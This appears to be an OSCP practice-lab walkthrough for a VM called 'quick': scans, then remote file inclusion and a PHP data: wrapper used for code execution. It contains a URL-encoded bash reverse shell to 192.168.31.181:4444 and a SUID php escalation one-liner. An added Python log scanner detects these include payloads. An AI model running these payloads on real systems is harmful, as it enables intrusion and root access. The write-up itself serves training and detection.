【OSCP】quick

admin, 2024-03-24 04:20:14, 2749 characters, 9 min 9 s read
OSCP practice range

Target introduction

quick

easy

Vulnerability discovery, RFI (remote file inclusion) exploitation, pseudo-protocol (PHP wrapper) abuse, SUID php privilege escalation

Information gathering

Host discovery

nmap -sn 192.168.31.0/24 

Port scan

└─# nmap -sV -A -p- -T4 192.168.31.97 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 11:44 EST
Nmap scan report for 192.168.31.97
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Directory scan

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -u http://192.168.31.97 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/images               (Status: 301) [Size: 315] [--> http://192.168.31.97/images/]
http://192.168.31.97/home.php             (Status: 200) [Size: 2534]
http://192.168.31.97/contact.php          (Status: 200) [Size: 1395]
http://192.168.31.97/about.php            (Status: 200) [Size: 1446]
http://192.168.31.97/index.php            (Status: 200) [Size: 3735]
http://192.168.31.97/cars.php             (Status: 200) [Size: 1502]
http://192.168.31.97/connect.php          (Status: 500) [Size: 0]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/send_email.php       (Status: 302) [Size: 0] [--> contact.php]
http://192.168.31.97/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Gaining access

A page parameter like this usually hides a file inclusion or command execution, but brute-forcing payloads against it produced no response. A nikto scan then found RFI.

http://192.168.31.97/index.php?page=cars
nikto --url http://192.168.31.97 

We wrote a phpinfo file on Kali, started a web server, and executed phpinfo through the remote file inclusion. Note that the application automatically appends a .php suffix to the included path.

Here we use a pseudo-protocol (the data: wrapper) directly to get a reverse shell.

http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E
http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.31.181/4444+0%3E%261%27%22);?%3E
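From the defender's side, the same include pattern is easy to spot in web-server logs. As an added example (not code from the original post), the Python below parses constructed Apache access-log lines and flags `page=` values that resolve to a remote URL or PHP wrapper, like the http:// and data: includes used above; the client IPs, timestamps and user agents are constructed.

```python
"""Flag RFI and PHP-wrapper abuse in the ``page`` parameter of Apache access
logs. Added example for the quick walkthrough, not code from the original
post; the log lines below are constructed, not captured from the box."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" format: client, timestamp, request line, status, size, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Schemes and wrappers that turn include($page . ".php") into code execution
# when allow_url_include=On, as the walkthrough shows with http:// and data:.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "data:", "php://", "expect://")

def classify_page(value):
    """Return a reason string if the include parameter looks malicious, else None."""
    decoded = unquote(unquote(value)).strip().lower()  # also catches double encoding
    for scheme in REMOTE_SCHEMES:
        if decoded.startswith(scheme):
            return "remote/wrapper include: " + scheme
    if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
        return "path traversal / null byte"
    return None

def scan_log(lines):
    """Return (client_ip, decoded_page, reason) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("page", []):
            reason = classify_page(value)
            if reason:
                hits.append((m.group("ip"), unquote(value), reason))
    return hits

# Constructed sample: one legitimate request, an RFI, a data: wrapper, traversal.
SAMPLE_LOG = [
    '192.168.31.50 - - [09/Feb/2024:11:50:01 -0500] "GET /index.php?page=cars HTTP/1.1" 200 1502 "-" "Mozilla/5.0"',
    '192.168.31.181 - - [09/Feb/2024:11:52:14 -0500] "GET /index.php?page=http://192.168.31.181/phpinfo HTTP/1.1" 200 68201 "-" "curl/8.5.0"',
    '192.168.31.181 - - [09/Feb/2024:11:53:02 -0500] "GET /index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E HTTP/1.1" 200 3800 "-" "curl/8.5.0"',
    '192.168.31.181 - - [09/Feb/2024:11:54:30 -0500] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 0 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for ip, page, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  {reason:<35} {page}")
```

The root cause on the box is `allow_url_include` combined with an unvalidated include path; the fix is an allowlist of page names on the server, with this check serving as a detection backstop.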

Privilege escalation

find / -type f -perm -u=s 2>/dev/null

https://gtfobins.github.io/gtfobins/php/#sudo

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh',['-p']);"

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】quick

Published by admin on 2024-03-24 04:20:14. When reprinting, please keep this link (CN-SEC, with thanks to the original author): https://cn-sec.com/archives/2598788.html
